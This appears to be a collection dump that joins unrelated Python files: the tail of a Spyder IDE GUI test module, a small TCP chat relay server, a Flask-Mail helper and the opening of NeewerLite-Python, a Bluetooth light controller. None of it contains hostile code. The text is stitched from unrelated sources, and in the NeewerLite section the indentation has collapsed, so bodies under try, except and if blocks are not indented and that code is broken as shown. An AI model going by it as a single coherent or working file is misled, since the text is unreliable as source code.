    tour_dialog = tours.get_container()._tour_dialog
    animated_tour = tours.get_container()._tour_widget
    # NOTE(review): qtbot.waitSignal is not entered as a context manager
    # here, so it does not actually block — confirm whether waiting on
    # sig_setup_finished is needed.
    qtbot.waitSignal(main_window.sig_setup_finished, timeout=30000)

    # Check that tour is shown automatically and manually show it
    assert tours.get_conf('show_tour_message')
    tours.show_tour_message(force=True)

    # Wait for the message to appear
    qtbot.waitUntil(lambda: bool(tour_dialog), timeout=5000)
    qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=2000)

    # Check that clicking dismiss hides the dialog and disables it
    qtbot.mouseClick(tour_dialog.dismiss_button, Qt.LeftButton)
    qtbot.waitUntil(lambda: not tour_dialog.isVisible(),
                    timeout=2000)
    assert not tours.get_conf('show_tour_message')

    # Confirm that calling show_tour_message() normally doesn't show it again
    tours.show_tour_message()
    qtbot.wait(2000)
    assert not tour_dialog.isVisible()

    # Ensure that it opens again with force=True
    tours.show_tour_message(force=True)
    qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=5000)

    # Run the tour and confirm it's running and the dialog is closed
    qtbot.mouseClick(tour_dialog.launch_tour_button, Qt.LeftButton)
    qtbot.waitUntil(lambda: animated_tour.is_running, timeout=9000)
    assert not tour_dialog.isVisible()
    assert not tours.get_conf('show_tour_message')

    # Close the tour
    animated_tour.close_tour()
    qtbot.waitUntil(lambda: not animated_tour.is_running, timeout=9000)
    tour_dialog.hide()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_complex_project
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="Only works on Linux")
def test_update_outline(main_window, qtbot, tmpdir):
    """
    Test that files in the Outline pane are updated at startup and
    after switching projects.
    """
    # Show outline explorer
    outline_explorer = main_window.outlineexplorer
    outline_explorer.toggle_view_action.setChecked(True)

    # Get Python editor trees
    treewidget = outline_explorer.get_widget().treewidget
    editors_py = [
        editor for editor in treewidget.editor_ids.keys()
        if editor.get_language() == 'Python'
    ]

    def editors_filled(editors):
        # True when every given editor shows exactly four symbols in its
        # outline tree (the expected count for the preloaded files).
        return all(
            len(treewidget.editor_tree_cache[editor.get_id()]) == 4
            for editor in editors
        )

    # Wait a bit for trees to be filled
    qtbot.waitUntil(lambda: editors_filled(editors_py), timeout=25000)

    # Assert all Python editors are filled
    assert editors_filled(editors_py)

    # Split editor
    editorstack = main_window.editor.get_current_editorstack()
    editorstack.sig_split_vertically.emit()
    qtbot.wait(1000)

    # Select file with no outline in split editorstack
    editorstack = main_window.editor.get_current_editorstack()
    editorstack.set_stack_index(2)
    editor = editorstack.get_current_editor()
    assert osp.splitext(editor.filename)[1] == '.txt'
    assert editor.is_cloned

    # Assert tree is empty
    editor_tree = treewidget.current_editor
    tree = treewidget.editor_tree_cache[editor_tree.get_id()]
    assert len(tree) == 0

    # Assert spinner is not shown
    assert not outline_explorer.get_widget()._spinner.isSpinning()

    # Hide outline from view
    outline_explorer.toggle_view_action.setChecked(False)

    # Remove content from first file
    editorstack.set_stack_index(0)
    editor = editorstack.get_current_editor()
    editor.selectAll()
    editor.cut()
    editorstack.save(index=0)

    # Assert outline was not updated while hidden.
    # Fix: the original line was a bare comparison without `assert`,
    # so it verified nothing.
    qtbot.wait(1000)
    assert len(
        treewidget.editor_tree_cache[treewidget.current_editor.get_id()]) == 4

    # Set some files as session without projects
    prev_filenames = ["prev_file_1.py", "prev_file_2.py"]
    prev_paths = []
    for fname in prev_filenames:
        file = tmpdir.join(fname)
        file.write(read_asset_file("script_outline_1.py"))
        prev_paths.append(str(file))
    CONF.set('editor', 'filenames', prev_paths)

    # Close project to open that file automatically
    main_window.projects.close_project()

    # Show outline again
    outline_explorer.toggle_view_action.setChecked(True)

    # Wait a bit for trees to be filled — this time for every open editor.
    qtbot.waitUntil(
        lambda: editors_filled(list(treewidget.editor_ids.keys())),
        timeout=3000)

    # Assert all editors are filled
    assert editors_filled(list(treewidget.editor_ids.keys()))

    # Remove test file from session
    CONF.set('editor', 'filenames', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_prevent_closing(main_window, qtbot):
    """
    Check we can bypass prevent closing.
    """
    source = "print(1 + 6)\nprint(1 + 6)\n"

    # Wait until the window is fully up.
    shellwidget = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(
        lambda: shellwidget._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Toolbar widgets used to start the debugger.
    debug_act = main_window.debug_toolbar_actions[0]
    debug_btn = main_window.debug_toolbar.widgetForAction(debug_act)

    # Start from a clean breakpoint state.
    main_window.editor.clear_all_breakpoints()

    # Put the code in a fresh editor with a breakpoint on line 1.
    main_window.editor.new()
    editor_widget = main_window.editor.get_focus_widget()
    editor_widget.set_text(source)
    editor_widget.debugger.toogle_breakpoint(line_number=1)

    # Start debugging and stop at the breakpoint.
    with qtbot.waitSignal(shellwidget.executed):
        qtbot.mouseClick(debug_btn, Qt.LeftButton)

    # With the option disabled, the file being debugged can be closed.
    CONF.set('ipython_console', 'pdb_prevent_closing', False)
    assert main_window.editor.get_current_editorstack().close_file()
    CONF.set('ipython_console', 'pdb_prevent_closing', True)

    # Closing the file must not have stopped the debugger.
    assert shellwidget.is_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
def test_continue_first_line(main_window, qtbot):
    """
    Check that, when 'pdb_stop_first_line' is disabled, the debugger runs
    the file to completion instead of stopping on its first line.
    """
    # Fix: the original docstring ("Check we can bypass prevent closing.")
    # was copy-pasted from test_prevent_closing and described the wrong
    # behavior.
    code = "print('a =', 1 + 6)\nprint('b =', 1 + 8)\n"

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)

    # Disable stopping on the first line before starting the debugger.
    CONF.set('ipython_console', 'pdb_stop_first_line', False)

    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)
    # The debugging should finish
    qtbot.waitUntil(lambda: not shell.is_debugging())
    CONF.set('ipython_console', 'pdb_stop_first_line', True)

    # Check everything was executed
    qtbot.waitUntil(lambda: "a = 7" in shell._control.toPlainText())
    assert "b = 9" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_outline_no_init(main_window, qtbot):
    """Check the Outline works for files in directories without __init__."""
    # Open file in one of our directories without an __init__ file
    spy_dir = osp.dirname(get_module_path('spyder'))
    main_window.editor.load(osp.join(spy_dir, 'tools', 'rm_whitespace.py'))

    # Show outline explorer
    outline_explorer = main_window.outlineexplorer
    outline_explorer.toggle_view_action.setChecked(True)

    # Wait a bit for trees to be filled
    qtbot.wait(5000)

    # Get tree length
    treewidget = outline_explorer.get_widget().treewidget
    # NOTE(review): index 1 assumes the loaded file is the second entry in
    # editor_ids — confirm this holds if the preloaded session changes.
    editor_id = list(treewidget.editor_ids.values())[1]

    # Assert symbols in the file are detected and shown
    assert len(treewidget.editor_tree_cache[editor_id]) > 0
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
                    reason="Flaky on Linux")
def test_pdb_without_comm(main_window, qtbot):
    """Check if pdb works without comm."""
    ipyconsole = main_window.ipyconsole
    shell = ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = ipyconsole.get_widget().get_focus_widget()

    # Close the comm on the kernel side so Spyder falls back to the plain
    # ipdb interface.
    with qtbot.waitSignal(shell.executed):
        shell.execute("get_ipython().kernel.frontend_comm.close()")
    shell.execute("%debug print()")
    qtbot.waitUntil(
        lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
    # Commands typed at the ipdb prompt must still run.
    qtbot.keyClicks(control, "print('Two: ' + str(1+1))")
    qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.waitUntil(
        lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')

    assert "Two: 2" in control.toPlainText()

    # Press step button and expect a sig_pdb_step signal
    with qtbot.waitSignal(shell.sig_pdb_step):
        main_window.editor.debug_command("step")

    # Stop debugging and expect an executed signal
    with qtbot.waitSignal(shell.executed):
        main_window.editor.stop_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="Flaky on Mac and Windows")
def test_print_comms(main_window, qtbot):
    """Test warning printed when comms print."""
    # Write code with a cell to a file
    # The `shape` property prints when accessed, which makes the comms
    # machinery emit output while building the namespace view.
    code = ("class Test:\n    @property\n    def shape(self):"
            "\n        print((10,))")
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_widget().get_focus_widget()
    nsb = main_window.variableexplorer.current_widget()

    # Create some output from spyder call
    with qtbot.waitSignal(shell.executed):
        shell.execute(code)

    assert nsb.editor.source_model.rowCount() == 0

    with qtbot.waitSignal(shell.executed):
        shell.execute("a = Test()")

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)

    # Make sure the warning is printed
    assert ("Output from spyder call 'get_namespace_view':"
            in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="UTF8 on Windows")
def test_goto_find(main_window, qtbot, tmpdir):
    """Test find goes to the right place."""
    # Use UTF8 only character to make sure positions are respected
    code = "we Weee wee\nWe\n🚫 wee"
    # (start, end) cursor offsets of each expected regex match in `code`.
    match_positions = [
        (0, 2),
        (3, 7),
        (8, 11),
        (12, 14),
        (18, 21)
    ]
    subdir = tmpdir.mkdir("find-sub")
    p = subdir.join("find-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))
    code_editor = main_window.editor.get_focus_widget()

    main_window.explorer.chdir(str(subdir))

    main_window.findinfiles.switch_to_plugin()
    findinfiles = main_window.findinfiles.get_widget()

    # Search case-insensitively for the regex 'we+'.
    findinfiles.set_search_text("we+")
    findinfiles.search_regexp_action.setChecked(True)
    findinfiles.case_action.setChecked(False)
    with qtbot.waitSignal(findinfiles.sig_finished, timeout=SHELL_TIMEOUT):
        findinfiles.find()

    results = findinfiles.result_browser.data
    assert len(results) == 5
    assert len(findinfiles.result_browser.files) == 1

    file_item = list(findinfiles.result_browser.files.values())[0]
    assert file_item.childCount() == 5

    for i in range(5):
        item = file_item.child(i)
        # Activating a result must move the editor cursor onto the match.
        findinfiles.result_browser.setCurrentItem(item)
        findinfiles.result_browser.activated(item)
        cursor = code_editor.textCursor()
        position = (cursor.selectionStart(), cursor.selectionEnd())
        assert position == match_positions[i]
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    os.name == 'nt',
    reason="test fails on windows.")
def test_copy_paste(main_window, qtbot, tmpdir):
    """Test copy paste."""
    code = (
        "if True:\n"
        "    class a():\n"
        "        def b():\n"
        "            print()\n"
        "        def c():\n"
        "            print()\n"
    )

    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)

    # Test copy
    # Select from the start of `def c` to the end so the copied text
    # carries an 8-space indent in its clipboard metadata.
    cursor = code_editor.textCursor()
    cursor.setPosition(69)
    cursor.movePosition(QTextCursor.End,
                        QTextCursor.KeepAnchor)
    code_editor.setTextCursor(cursor)
    qtbot.keyClick(code_editor, "c", modifier=Qt.ControlModifier)
    assert QApplication.clipboard().text() == (
        "def c():\n            print()\n")
    assert CLIPBOARD_HELPER.metadata_indent == 8

    # Test paste in console
    # Pasting into the console must dedent the code to the prompt level.
    qtbot.keyClick(shell._control, "v", modifier=Qt.ControlModifier)
    expected = "In [1]: def c():\n   ...:     print()"
    assert expected in shell._control.toPlainText()

    # Test paste at zero indentation
    qtbot.keyClick(code_editor, Qt.Key_Backspace)
    qtbot.keyClick(code_editor, Qt.Key_Backspace)
    qtbot.keyClick(code_editor, Qt.Key_Backspace)
    # Check again that the clipboard is ready
    assert QApplication.clipboard().text() == (
        "def c():\n            print()\n")
    assert CLIPBOARD_HELPER.metadata_indent == 8
    qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier)
    assert "\ndef c():\n    print()" in code_editor.toPlainText()

    # Test paste at automatic indentation
    qtbot.keyClick(code_editor, "z", modifier=Qt.ControlModifier)
    qtbot.keyClick(code_editor, Qt.Key_Tab)
    qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier)
    expected = (
        "\n"
        "        def c():\n"
        "            print()\n"
    )
    assert expected in code_editor.toPlainText()
@pytest.mark.slow
@pytest.mark.skipif(not running_in_ci(), reason="Only works in CIs")
def test_add_external_plugins_to_dependencies(main_window):
    """Test that we register external plugins in the main window."""
    # Collect the package name of every registered dependency, dropping
    # entries that have none (or an empty one).
    candidate_names = (getattr(dep, 'package_name', None)
                       for dep in DEPENDENCIES)
    external_names = [name for name in candidate_names if name]
    assert 'spyder-boilerplate' in external_names
@pytest.mark.slow
@flaky(max_runs=3)
def test_print_multiprocessing(main_window, qtbot, tmpdir):
    """Test print commands from multiprocessing.

    Runs a script that spawns a multiprocessing.Process and checks that
    both the child's stdout and stderr output reach the IPython console.
    """
    # Write code with a cell to a file
    # NOTE(review): indentation inside this script string appears to have
    # been collapsed by the extraction; reconstructed — verify upstream.
    code = """
import multiprocessing
import sys

def test_func():
    print("Test stdout")
    print("Test stderr", file=sys.stderr)

if __name__ == "__main__":
    p = multiprocessing.Process(target=test_func)
    p.start()
    p.join()
"""
    p = tmpdir.join("print-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))

    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_widget().get_focus_widget()

    # Click the run button
    run_action = main_window.run_toolbar_actions[0]
    run_button = main_window.run_toolbar.widgetForAction(run_action)
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(run_button, Qt.LeftButton)
    # Give the child process time to run and flush its output.
    qtbot.wait(1000)

    assert 'Test stdout' in control.toPlainText()
    assert 'Test stderr' in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    os.name == 'nt',
    reason="ctypes.string_at(0) doesn't segfaults on Windows")
def test_print_faulthandler(main_window, qtbot, tmpdir):
    """Test printing segfault info from kernel crashes.

    Runs a script that dereferences a null pointer via ctypes, crashing
    the kernel, and checks that the faulthandler report (including the
    name of the crashing function) is printed in the console.
    """
    # Write code with a cell to a file
    code = """
def crash_func():
    import ctypes; ctypes.string_at(0)
crash_func()
"""
    p = tmpdir.join("print-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))

    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_widget().get_focus_widget()

    # Click the run button
    run_action = main_window.run_toolbar_actions[0]
    run_button = main_window.run_toolbar.widgetForAction(run_action)
    # No shell.executed signal to wait on — the kernel dies; just give it
    # time to crash and for the segfault report to be shown.
    qtbot.mouseClick(run_button, Qt.LeftButton)
    qtbot.wait(5000)

    assert 'Segmentation fault' in control.toPlainText()
    assert 'in crash_func' in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
# Fix: the test carried two identical `os.name == 'nt'` skipif decorators
# ("Tour messes up focus on Windows" and "Fails on Windows"); it was being
# skipped twice for the same condition. Merged into a single decorator.
@pytest.mark.skipif(os.name == 'nt',
                    reason="Fails on Windows (tour messes up focus)")
@pytest.mark.parametrize("focus_to_editor", [True, False])
def test_focus_to_editor(main_window, qtbot, tmpdir, focus_to_editor):
    """Test that the focus_to_editor option works as expected.

    With focus_to_editor enabled, running a cell or a selection must keep
    focus in the editor (and must not ask to switch to the console);
    with it disabled, focus must move to the console's control widget.
    """
    # Write code with cells to a file
    code = """# %%
def foo(x):
    return 2 * x

# %%
foo(1)
"""
    p = tmpdir.join("test.py")
    p.write(code)

    # Load code in the editor
    main_window.editor.load(to_text_string(p))

    # Change focus_to_editor option
    main_window.editor.set_option('focus_to_editor', focus_to_editor)
    main_window.editor.apply_plugin_settings({'focus_to_editor'})
    code_editor = main_window.editor.get_current_editor()

    # Wait for the console to be up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_widget().get_focus_widget()

    # Be sure the focus is on the editor before proceeding
    code_editor.setFocus()
    assert QApplication.focusWidget() is code_editor

    # Select the run cell button to click it
    run_cell_action = main_window.run_toolbar_actions[1]
    run_cell_button = main_window.run_toolbar.widgetForAction(run_cell_action)

    # Make sure we don't switch to the console after pressing the button
    if focus_to_editor:
        with qtbot.assertNotEmitted(
            main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000
        ):
            qtbot.mouseClick(run_cell_button, Qt.LeftButton)
    else:
        qtbot.mouseClick(run_cell_button, Qt.LeftButton)
        qtbot.wait(1000)

    # Check the right widget has focus
    focus_widget = QApplication.focusWidget()
    if focus_to_editor:
        assert focus_widget is code_editor
    else:
        assert focus_widget is control

    # Give focus back to the editor before running the next test
    if not focus_to_editor:
        code_editor.setFocus()

    # Move cursor to last line to run it
    cursor = code_editor.textCursor()
    cursor.movePosition(QTextCursor.End, QTextCursor.MoveAnchor)
    cursor.movePosition(QTextCursor.PreviousBlock, QTextCursor.KeepAnchor)
    code_editor.setTextCursor(cursor)

    # Select the run selection button to click it
    run_selection_action = main_window.run_toolbar_actions[3]
    run_selection_button = main_window.run_toolbar.widgetForAction(
        run_selection_action)

    # Make sure we don't switch to the console after pressing the button
    if focus_to_editor:
        with qtbot.assertNotEmitted(
            main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000
        ):
            qtbot.mouseClick(run_selection_button, Qt.LeftButton)
    else:
        qtbot.mouseClick(run_selection_button, Qt.LeftButton)
        qtbot.wait(1000)

    # Check the right widget has focus
    focus_widget = QApplication.focusWidget()
    if focus_to_editor:
        assert focus_widget is code_editor
    else:
        assert focus_widget is control
@pytest.mark.slow
@flaky(max_runs=3)
def test_focus_to_consoles(main_window, qtbot):
    """
    Check that we give focus to the text widget of our consoles after focus
    is given to their dockwidgets.
    """
    # Wait for the console to be up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_widget().get_focus_widget()

    # Show internal console
    console = main_window.get_plugin(Plugins.Console)
    console.toggle_view_action.setChecked(True)

    # Change to the IPython console and assert focus is given to its focus
    # widget
    main_window.ipyconsole.dockwidget.raise_()
    focus_widget = QApplication.focusWidget()
    assert focus_widget is control

    # Change to the Internal console and assert focus is given to its focus
    # widget
    console.dockwidget.raise_()
    focus_widget = QApplication.focusWidget()
    assert focus_widget is console.get_widget().get_focus_widget()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Hangs sometimes on Windows")
def test_rename_files_in_editor_after_folder_rename(main_window, mocker,
                                                    tmpdir):
    """
    Check that we rename files in the editor after the directory that
    contains them was renamed in Files.
    """
    old_path = 'test_rename_old'
    new_path = 'test_rename_new'
    fname = 'foo.py'

    # Mock output of QInputDialog to set new path after rename
    # (the rename dialog would otherwise block waiting for user input).
    mocker.patch.object(QInputDialog, 'getText',
                        return_value=(new_path, True))

    # Create temp folder and simple file on it
    file = tmpdir.mkdir(old_path).join(fname)
    file.write("print('Hello world!')")

    # Load file in editor
    editor = main_window.get_plugin(Plugins.Editor)
    editor.load(str(file))

    # Switch to temp dir and give focus to Files
    explorer = main_window.get_plugin(Plugins.Explorer)
    explorer.chdir(str(tmpdir))
    explorer.switch_to_plugin()
    explorer.get_widget().get_focus_widget().setFocus()

    # Select directory in widget
    treewidget = explorer.get_widget().treewidget
    idx = treewidget.get_index(old_path)
    treewidget.setCurrentIndex(idx)

    # Rename directory (uses the mocked QInputDialog above)
    treewidget.rename()

    # Check file was renamed in editor
    codeeditor = editor.get_current_editor()
    assert codeeditor.filename == osp.join(str(tmpdir), new_path, fname)
@pytest.mark.slow
@flaky(max_runs=3)
def test_history_from_ipyconsole(main_window, qtbot):
    """
    Check that we register commands introduced in the IPython console in
    the History pane.
    """
    # Wait for the console to be up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Run some code in the console
    code = '5 + 3'
    with qtbot.waitSignal(shell.executed):
        shell.execute(code)

    # Check that code is displayed in History: the executed command must
    # be the last line recorded in the history editor.
    history = main_window.get_plugin(Plugins.History)
    history.switch_to_plugin()
    history_editor = history.get_widget().editors[0]
    text = history_editor.toPlainText()
    assert text.splitlines()[-1] == code
@pytest.mark.slow
def test_debug_unsaved_function(main_window, qtbot):
    """
    Test that a breakpoint in an unsaved file is reached.
    """
    # Main variables
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    run_action = main_window.run_toolbar_actions[0]
    run_button = main_window.run_toolbar.widgetForAction(run_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    # NOTE(review): whitespace inside these strings may have been collapsed
    # by the extraction — verify against upstream Spyder.
    code_editor.set_text('def foo():\n print(1)')

    # Set breakpoint on the print() line
    # NOTE(review): "toogle_breakpoint" is the debugger API's own
    # (misspelled) method name, not a typo introduced here.
    code_editor.debugger.toogle_breakpoint(line_number=2)

    # run file so that foo() is defined in the kernel
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(run_button, Qt.LeftButton)

    # debug foo; 'continue' should stop at the breakpoint in the
    # unsaved buffer instead of running to completion
    with qtbot.waitSignal(shell.executed):
        shell.execute('%debug foo()')
    with qtbot.waitSignal(shell.executed):
        shell.execute('continue')

    assert "1---> 2 print(1)" in control.toPlainText()
if __name__ == "__main__":
    # Allow running this test module directly with python.
    pytest.main()
|
servidor.py | import socket
import threading
import sys
import pickle
import os
class Servidor():
    """Minimal TCP chat relay server.

    Accepts client connections on a background thread and relays every
    message received from one client to all the others.  The constructor
    blocks on a console prompt until 'Q' is entered, then closes the
    listening socket and exits the process.
    """

    def __init__(self, host=None, port=59989):
        # Fix: the original default was host=socket.gethostname(), which is
        # evaluated once at definition time; resolve it at call time instead.
        # Passing host explicitly behaves exactly as before.
        if host is None:
            host = socket.gethostname()
        self.clientes = []  # currently connected client sockets
        self.sock = socket.socket()
        self.sock.bind((str(host), int(port)))
        self.sock.listen(20)
        # Non-blocking: accept()/recv() raise BlockingIOError instead of
        # blocking, so the worker threads can poll.
        self.sock.setblocking(False)

        aceptar = threading.Thread(target=self.aceptarC)
        procesar = threading.Thread(target=self.procesarC)
        aceptar.daemon = True
        aceptar.start()
        procesar.daemon = True
        procesar.start()

        # Console loop: typing 'Q' shuts the server down.
        while True:
            msg = input('SALIR = Q\n')
            if msg == 'Q':
                print("**** TALOGOOO *****")
                self.sock.close()
                sys.exit()

    def broadcast(self, msg, cliente):
        """Send *msg* to every connected client except *cliente*.

        Clients whose socket raises on send are dropped from the list.
        """
        # Fix: iterate over a copy — removing from the list while iterating
        # it silently skips the next client (bug in the original).
        for c in list(self.clientes):
            if c != cliente:
                try:
                    c.send(msg)
                except OSError:  # narrowed from a bare except
                    self.clientes.remove(c)

    def aceptarC(self):
        """Background thread: accept incoming connections forever."""
        while True:
            try:
                conn, addr = self.sock.accept()
                print(f"\nConexion aceptada via {conn}\n")
                conn.setblocking(False)
                self.clientes.append(conn)
            except OSError:
                # Non-blocking accept raises BlockingIOError (an OSError)
                # when no connection is pending; just retry.
                pass

    def procesarC(self):
        """Background thread: poll clients and relay any received data."""
        print("Procesamiento de mensajes iniciado")
        while True:
            if len(self.clientes) > 0:
                # Iterate over a copy: broadcast() may remove clients.
                for c in list(self.clientes):
                    try:
                        data = c.recv(32)
                        if data:
                            self.broadcast(data, c)
                        # NOTE(review): recv() returning b"" means the peer
                        # closed cleanly; as in the original, such clients
                        # are only dropped once a send to them fails.
                    except OSError:
                        # No data ready on this non-blocking socket.
                        pass
s = Servidor() |
email.py | from flask_mail import Message
from flask import render_template, current_app
from decouple import config
from . import mail
from time import sleep
from threading import Thread
def send_async_email(app, msg):
    """Send *msg* with Flask-Mail inside *app*'s application context.

    Runs in a worker thread (started by mail_message), so it needs an
    explicit application context to reach the mail extension's config.

    Fix: removed the 22-second countdown loop that was explicitly marked
    "block only for testing parallel thread" — leftover debug code that
    delayed every outgoing email.
    """
    with app.app_context():
        mail.send(msg)
def mail_message(subject, template, to, **kwargs):
    """Render *template*.html with **kwargs and email it to *to*.

    The message is sent on a background thread so the request that
    triggered it is not blocked; the started Thread is returned so
    callers can join() it if needed.
    """
    app = current_app._get_current_object()
    sender_email = config("MAIL_USERNAME", default="")
    # Fix: sender=("Epic Blogs") was just the string "Epic Blogs" (the
    # parentheses do not make a tuple), and the configured address in
    # sender_email was fetched but never used.  Flask-Mail expects a
    # (display name, address) tuple.
    msg = Message(subject, sender=("Epic Blogs", sender_email),
                  recipients=[to])
    msg.html = render_template(template + ".html", **kwargs)
    thr = Thread(target=send_async_email, args=[app, msg])
    thr.start()
    return thr
NeewerLite-Python.py | #############################################################
## NeewerLite-Python
## by Zach Glenwright
#############################################################
## > https://github.com/taburineagle/NeewerLite-Python/ <
#############################################################
## A cross-platform Python script using the bleak and
## PySide2 libraries to control Neewer brand lights via
## Bluetooth on multiple platforms -
## Windows, Linux/Ubuntu, MacOS and RPi
#############################################################
## Based on the NeewerLight project by @keefo (Xu Lian)
## > https://github.com/keefo/NeewerLite <
#############################################################
import os
import sys
import argparse
import platform # used to determine which OS we're using for MAC address/GUID listing
import asyncio
import threading
import time
from datetime import datetime
# IMPORT BLEAK (this is the library that allows the program to communicate with the lights) - THIS IS NECESSARY!
try:
from bleak import BleakScanner, BleakClient
except ModuleNotFoundError as e:
print(" ===== CAN NOT FIND BLEAK LIBRARY =====")
print(" You need the bleak Python package installed to use NeewerLite-Python.")
print(" Bleak is the library that connects the program to Bluetooth devices.")
print(" Please install the Bleak package first before running NeewerLite-Python.")
print()
print(" To install Bleak, run either pip or pip3 from the command line:")
print(" pip install bleak")
print(" pip3 install bleak")
print()
print(" Or visit this website for more information:")
print(" https://pypi.org/project/bleak/")
sys.exit(1) # you can't use the program itself without Bleak, so kill the program if we don't have it
# IMPORT THE WINDOWS LIBRARY (if you don't do this, it will throw an exception on Windows only)
if platform.system() == "Windows": # try to load winrt if we're on Windows
try:
from winrt import _winrt
_winrt.uninit_apartment()
except Exception as e:
pass # if there is an exception to this module loading, you're not on Windows
importError = 0 # whether or not there's an issue loading PySide2 or the GUI file
# IMPORT PYSIDE2 (the GUI libraries)
try:
from PySide2.QtCore import Qt
from PySide2.QtGui import QLinearGradient, QColor, QKeySequence
from PySide2.QtWidgets import QApplication, QMainWindow, QTableWidgetItem, QShortcut
except Exception as e:
importError = 1 # log that we can't find PySide2
# IMPORT THE GUI ITSELF
try:
from ui_NeewerLightUI import Ui_MainWindow
except Exception as e:
if importError != 1: # if we don't already have a PySide2 issue
importError = 2 # log that we can't find the GUI file - which, if the program is downloaded correctly, shouldn't be an issue
# IMPORT THE HTTP SERVER
try:
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
except Exception as e:
pass # if there are any HTTP errors, don't do anything yet
CCTSlider = -1 # the current slider moved in the CCT window - 1 - Brightness / 2 - Hue / -1 - Both Brightness and Hue
sendValue = [] # an array to hold the values to be sent to the light
lastAnimButtonPressed = 1 # which animation button you clicked last - if none, then it defaults to 1 (the police sirens)
availableLights = [] # the list of Neewer lights currently available to control - format:
# 0 1 2 3 4 5 6 7
# [Bleak Scan Object, Bleak Connection, Custom Name, Last Params, Extend CCT Range, Send BRI/HUE independently, Light On/Off, Power/CH Data Returned]
threadAction = "" # the current action to take from the thread
setLightUUID = "69400002-B5A3-F393-E0A9-E50E24DCCA99" # the UUID to send information to the light
notifyLightUUID = "69400003-B5A3-F393-E0A9-E50E24DCCA99" # the UUID for notify callbacks from the light
maxNumOfAttempts = 6 # the maximum attempts CLI mode will attempt before quitting out
# FOR TESTING PURPOSES / FIRST-LAUNCH PREFERENCES
startup_findLights = True # whether or not to look for lights when the program starts
startup_connectLights = True # whether or not to auto-connect to lights after finding them
printDebug = True # show debug messages in the console for all of the program's events
receivedData = "" # the data received from the Notify characteristic
try: # try to load the GUI
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
    """Set up the main window UI, wire widget handlers and show the window."""
    QMainWindow.__init__(self)
    self.setupUi(self)  # set up the main UI
    self.connectMe()  # connect the function handlers to the widgets

    if startup_findLights == True:  # if we're set up to find lights on startup, then indicate that
        self.statusBar.showMessage("Please wait - searching for Neewer lights...")
    else:
        self.statusBar.showMessage("Welcome to NeewerLite-Python! Hit the Scan button above to scan for lights.")

